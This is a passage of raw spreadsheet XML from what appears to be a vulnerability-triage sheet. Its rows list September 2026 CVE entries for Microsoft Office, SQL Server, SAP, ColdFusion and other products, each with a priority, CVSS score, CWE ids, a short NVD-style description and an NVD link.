t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1121" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1121" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72975</t></is></c></row><row r="1122"><c r="A1122" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1122" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1122" s="5" t="inlineStr"><is><t>CVE-2026-72977</t></is></c><c r="D1122" s="5" t="n"><v>6.5</v></c><c r="E1122" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1122" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1122" s="5" t="inlineStr" /><c r="H1122" s="5" t="n"><v>0.01</v></c><c r="I1122" s="5" t="inlineStr" /><c r="J1122" s="5" t="inlineStr" /><c r="K1122" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L1122" s="5" t="inlineStr" /><c r="M1122" s="5" t="inlineStr" /><c r="N1122" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1122" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1122" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1122" s="5" t="inlineStr" /><c r="R1122" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S1122" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1122" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72977</t></is></c></row><row r="1123"><c r="A1123" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1123" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1123" s="5" t="inlineStr"><is><t>CVE-2026-73029</t></is></c><c r="D1123" s="5" t="n"><v>6.5</v></c><c r="E1123" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1123" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1123" s="5" t="inlineStr" /><c r="H1123" s="5" t="n"><v>0.007</v></c><c r="I1123" s="5" t="inlineStr" /><c r="J1123" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1123" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1123" s="5" t="inlineStr" /><c r="M1123" s="5" t="inlineStr" /><c r="N1123" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1123" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1123" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1123" s="5" t="inlineStr" /><c r="R1123" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1123" s="5" t="inlineStr"><is><t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1123" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73029</t></is></c></row><row r="1124"><c r="A1124" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1124" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1124" s="5" t="inlineStr"><is><t>CVE-2026-76000</t></is></c><c r="D1124" s="5" t="n"><v>6.5</v></c><c r="E1124" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1124" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1124" s="5" t="inlineStr" /><c r="H1124" s="5" t="n"><v>0.003</v></c><c r="I1124" s="5" t="inlineStr" /><c r="J1124" s="5" t="inlineStr" /><c r="K1124" s="5" t="inlineStr" /><c r="L1124" s="5" t="inlineStr" /><c r="M1124" s="5" t="inlineStr" /><c r="N1124" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1124" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1124" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1124" s="5" t="inlineStr" /><c r="R1124" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1124" s="5" t="inlineStr"><is><t>ColdFusion is affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction.</t></is></c><c r="T1124" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76000</t></is></c></row><row r="1125"><c r="A1125" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1125" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1125" s="5" t="inlineStr"><is><t>CVE-2026-76968</t></is></c><c r="D1125" s="5" t="n"><v>6.5</v></c><c r="E1125" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1125" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1125" s="5" t="inlineStr" /><c r="H1125" s="5" t="n"><v>0.002</v></c><c r="I1125" s="5" t="inlineStr" /><c r="J1125" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1125" s="5" t="inlineStr" /><c r="L1125" s="5" t="inlineStr" /><c r="M1125" s="5" t="inlineStr" /><c r="N1125" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1125" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1125" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1125" s="5" t="inlineStr" /><c r="R1125" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1125" s="5" t="inlineStr"><is><t>SAP Web Dispatcher, Internet Communication Manager and SAP Content Server allows an authenticated low-privileged attacker to access certain administrative functionality or interface and obtain sensitive information about the system state, resulting in information disclosure. This disclosed information could potentially be used to facilitate further attacks. This vulnerability has a high impact on the confidentiality of the application, with no impact on integrity or availability.</t></is></c><c r="T1125" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76968</t></is></c></row><row r="1126"><c r="A1126" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1126" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1126" s="5" t="inlineStr"><is><t>CVE-2026-76971</t></is></c><c r="D1126" s="5" t="n"><v>6.5</v></c><c r="E1126" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1126" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1126" s="5" t="inlineStr" /><c r="H1126" s="5" t="n"><v>0.001</v></c><c r="I1126" s="5" t="inlineStr" /><c r="J1126" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1126" s="5" t="inlineStr" /><c r="L1126" s="5" t="inlineStr" /><c r="M1126" s="5" t="inlineStr" /><c r="N1126" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1126" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1126" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1126" s="5" t="inlineStr" /><c r="R1126" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1126" s="5" t="inlineStr"><is><t>Due to a Server-Side Request Forgery (SSRF) vulnerability in SAP Manufacturing Integration and Intelligence, an attacker could cause the server to initiate arbitrary outbound requests. If processed by the application, this behavior could be combined with XML/XSL processing to enable execution of scripts. Successful exploitation could result in a low impact on the confidentiality, integrity, and availability of the application.</t></is></c><c r="T1126" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76971</t></is></c></row><row r="1127"><c r="A1127" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1127" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1127" s="5" t="inlineStr"><is><t>CVE-2026-77896</t></is></c><c r="D1127" s="5" t="n"><v>6.5</v></c><c r="E1127" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1127" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1127" s="5" t="inlineStr" /><c r="H1127" s="5" t="n"><v>0.007</v></c><c r="I1127" s="5" t="inlineStr" /><c r="J1127" s="5" t="inlineStr" /><c r="K1127" s="5" t="inlineStr" /><c r="L1127" s="5" t="inlineStr" /><c r="M1127" s="5" t="inlineStr" /><c r="N1127" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1127" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1127" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1127" s="5" t="inlineStr" /><c r="R1127" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S1127" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Remote Desktop Client allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1127" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77896</t></is></c></row><row r="1128"><c r="A1128" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1128" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1128" s="5" t="inlineStr"><is><t>CVE-2026-77911</t></is></c><c r="D1128" s="5" t="n"><v>6.5</v></c><c r="E1128" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1128" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1128" s="5" t="inlineStr" /><c r="H1128" s="5" t="n"><v>0.007</v></c><c r="I1128" s="5" t="inlineStr" /><c r="J1128" s="5" t="inlineStr" /><c r="K1128" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1128" s="5" t="inlineStr" /><c r="M1128" s="5" t="inlineStr" /><c r="N1128" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1128" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1128" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1128" s="5" t="inlineStr" /><c r="R1128" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1128" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1128" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77911</t></is></c></row><row r="1129"><c r="A1129" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1129" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1129" s="5" t="inlineStr"><is><t>CVE-2026-78441</t></is></c><c r="D1129" s="5" t="n"><v>6.5</v></c><c r="E1129" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1129" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1129" s="5" t="inlineStr" /><c r="H1129" s="5" t="n"><v>0.007</v></c><c r="I1129" s="5" t="inlineStr" /><c r="J1129" s="5" t="inlineStr" /><c r="K1129" s="5" t="inlineStr" /><c r="L1129" s="5" t="inlineStr" /><c r="M1129" s="5" t="inlineStr" /><c r="N1129" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1129" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1129" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1129" s="5" t="inlineStr" /><c r="R1129" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1129" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows OLE DB allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1129" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78441</t></is></c></row><row r="1130"><c r="A1130" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1130" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1130" s="5" t="inlineStr"><is><t>CVE-2026-78453</t></is></c><c r="D1130" s="5" t="n"><v>6.5</v></c><c r="E1130" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1130" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1130" s="5" t="inlineStr" /><c r="H1130" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1130" s="5" t="inlineStr" /><c r="J1130" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K113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130" s="5" t="inlineStr" /><c r="M1130" s="5" t="inlineStr" /><c r="N1130" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1130" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1130" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1130" s="5" t="inlineStr" /><c r="R1130" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1130" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1130" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78453</t></is></c></row><row r="1131"><c r="A1131" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1131" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1131" s="5" t="inlineStr"><is><t>CVE-2026-78502</t></is></c><c r="D1131" s="5" t="n"><v>6.5</v></c><c r="E1131" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1131" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1131" s="5" t="inlineStr" /><c r="H1131" s="5" t="n"><v>0.007</v></c><c r="I1131" s="5" t="inlineStr" /><c r="J1131" s="5" t="inlineStr" /><c r="K1131" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1131" s="5" t="inlineStr" /><c r="M1131" s="5" t="inlineStr" /><c r="N1131" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1131" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1131" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1131" s="5" t="inlineStr" /><c r="R1131" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1131" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1131" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78502</t></is></c></row><row r="1132"><c r="A1132" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1132" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1132" s="5" t="inlineStr"><is><t>CVE-2026-78503</t></is></c><c r="D1132" s="5" t="n"><v>6.5</v></c><c r="E1132" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1132" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1132" s="5" t="inlineStr" /><c r="H1132" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1132" s="5" t="inlineStr" /><c r="J1132" s="5" t="inlineStr" /><c r="K1132" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1132" s="5" t="inlineStr" /><c r="M1132" s="5" t="inlineStr" /><c r="N1132" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1132" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1132" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1132" s="5" t="inlineStr" /><c r="R1132" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1132" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1132" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78503</t></is></c></row><row r="1133"><c r="A1133" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1133" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1133" s="5" t="inlineStr"><is><t>CVE-2026-78515</t></is></c><c r="D1133" s="5" t="n"><v>6.5</v></c><c r="E1133" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1133" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1133" s="5" t="inlineStr" /><c r="H1133" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1133" s="5" t="inlineStr" /><c r="J1133" s="5" t="inlineStr" /><c r="K1133" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1133" s="5" t="inlineStr" /><c r="M1133" s="5" t="inlineStr" /><c r="N1133" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1133" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1133" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1133" s="5" t="inlineStr" /><c r="R1133" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1133" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1133" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78515</t></is></c></row><row r="1134"><c r="A1134" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1134" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1134" s="5" t="inlineStr"><is><t>CVE-2026-78520</t></is></c><c r="D1134" s="5" t="n"><v>6.5</v></c><c r="E1134" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1134" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1134" s="5" t="inlineStr" /><c r="H1134" s="5" t="n"><v>0.007</v></c><c r="I1134" s="5" t="inlineStr" /><c r="J1134" s="5" t="inlineStr" /><c r="K1134" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1134" s="5" t="inlineStr" /><c r="M1134" s="5" t="inlineStr" /><c r="N1134" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1134" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1134" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1134" s="5" t="inlineStr" /><c r="R1134" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1134" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T1134" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78520</t></is></c></row><row r="1135"><c r="A1135" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1135" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1135" s="5" t="inlineStr"><is><t>CVE-2026-78522</t></is></c><c r="D1135" s="5" t="n"><v>6.5</v></c><c r="E1135" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1135" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1135" s="5" t="inlineStr" /><c r="H1135" s="5" t="n"><v>0.007</v></c><c r="I1135" s="5" t="inlineStr" /><c r="J1135" s="5" t="inlineStr" /><c r="K1135" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1135" s="5" t="inlineStr" /><c r="M1135" s="5" t="inlineStr" /><c r="N1135" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1135" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1135" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1135" s="5" t="inlineStr" /><c r="R1135" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1135" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1135" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78522</t></is></c></row><row r="1136"><c r="A1136" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1136" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1136" s="5" t="inlineStr"><is><t>CVE-2026-78838</t></is></c><c r="D1136" s="5" t="n"><v>6.5</v></c><c r="E1136" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1136" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1136" s="5" t="inlineStr" /><c r="H1136" s="5" t="n"><v>0.004</v></c><c r="I1136" s="5" t="inlineStr" /><c r="J1136" s="5" t="inlineStr" /><c r="K1136" s="5" t="inlineStr" /><c r="L1136" s="5" t="inlineStr" /><c r="M1136" s="5" t="inlineStr" /><c r="N1136" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1136" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1136" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1136" s="5" t="inlineStr" /><c r="R1136" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1136" s="5" t="inlineStr"><is><t>A reflected cross-site scripting (XSS) vulnerability in the grid_datasource.php component of AppNitro MachForm v30 allows attackers to execute arbitrary Javascript in the context of the victim's browser via injecting a crafted payload into the filter[filters][0][field] parameter.</t></is></c><c r="T1136" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78838</t></is></c></row><row r="1137"><c r="A1137" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1137" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1137" s="5" t="inlineStr"><is><t>CVE-2026-79379</t></is></c><c r="D1137" s="5" t="n"><v>6.5</v></c><c r="E1137" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1137" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1137" s="5" t="inlineStr" /><c r="H1137" s="5" t="n"><v>0.003</v></c><c r="I1137" s="5" t="inlineStr" /><c r="J1137" s="5" t="inlineStr" /><c r="K1137" s="5" t="inlineStr" /><c r="L1137" s="5" t="inlineStr" /><c r="M1137" s="5" t="inlineStr" /><c r="N1137" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1137" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1137" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1137" s="5" t="inlineStr" /><c r="R1137" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S1137" s="5" t="inlineStr"><is><t>A buffer overflow in the SBC_DecodeFrames() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier and fixed in v.5.0 allows attackers to cause a Denial of Service (DoS) via sending a crafted frame.</t></is></c><c r="T1137" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79379</t></is></c></row><row r="1138"><c r="A1138" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1138" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1138" s="5" t="inlineStr"><is><t>CVE-2026-79573</t></is></c><c r="D1138" s="5" t="n"><v>6.5</v></c><c r="E1138" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1138" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1138" s="5" t="inlineStr" /><c r="H1138" s="5" t="n"><v>0.003</v></c><c r="I1138" s="5" t="inlineStr" /><c r="J1138" s="5" t="inlineStr" /><c r="K1138" s="5" t="inlineStr" /><c r="L1138" s="5" t="inlineStr" /><c r="M1138" s="5" t="inlineStr" /><c r="N1138" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1138" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1138" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1138" s="5" t="inlineStr" /><c r="R1138" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1138" s="5" t="inlineStr"><is><t>L-ONE v1.0.0 was discovered to contain multiple SQL injection vulnerabilities in the /attachment/getBusinessUploadList component via the busid, id, and taskid parameters. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T1138" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79573</t></is></c></row><row r="1139"><c r="A1139" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1139" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1139" s="5" t="inlineStr"><is><t>CVE-2026-80073</t></is></c><c r="D1139" s="5" t="n"><v>6.5</v></c><c r="E1139" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1139" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1139" s="5" t="inlineStr" /><c r="H1139" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1139" s="5" t="inlineStr" /><c r="J1139" s="5" t="inlineStr" /><c r="K1139" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t></is></c><c r="L1139" s="5" t="inlineStr" /><c r="M1139" s="5" t="inlineStr" /><c r="N1139" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1139" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1139" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1139" s="5" t="inlineStr" /><c r="R1139" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1139" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1139" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80073</t></is></c></row><row r="1140"><c r="A1140" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1140" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1140" s="5" t="inlineStr"><is><t>CVE-2026-80076</t></is></c><c r="D1140" s="5" t="n"><v>6.5</v></c><c r="E1140" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1140" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1140" s="5" t="inlineStr" /><c r="H1140" s="5" t="n"><v>0.007</v></c><c r="I1140" s="5" t="inlineStr" /><c r="J1140" s="5" t="inlineStr" /><c r="K1140" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1140" s="5" t="inlineStr" /><c r="M1140" s="5" t="inlineStr" /><c r="N1140" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1140" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1140" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1140" s="5" t="inlineStr" /><c r="R1140" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1140" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1140" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80076</t></is></c></row><row r="1141"><c r="A1141" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1141" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1141" s="5" t="inlineStr"><is><t>CVE-2026-80078</t></is></c><c r="D1141" s="5" t="n"><v>6.5</v></c><c r="E1141" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1141" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1141" s="5" t="inlineStr" /><c r="H1141" s="5" t="n"><v>0.007</v></c><c r="I1141" s="5" t="inlineStr" /><c r="J1141" s="5" t="inlineStr" /><c r="K1141" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1141" s="5" t="inlineStr" /><c r="M1141" s="5" t="inlineStr" /><c r="N1141" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1141" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1141" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1141" s="5" t="inlineStr" /><c r="R1141" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1141" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1141" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80078</t></is></c></row><row r="1142"><c r="A1142" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1142" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1142" s="5" 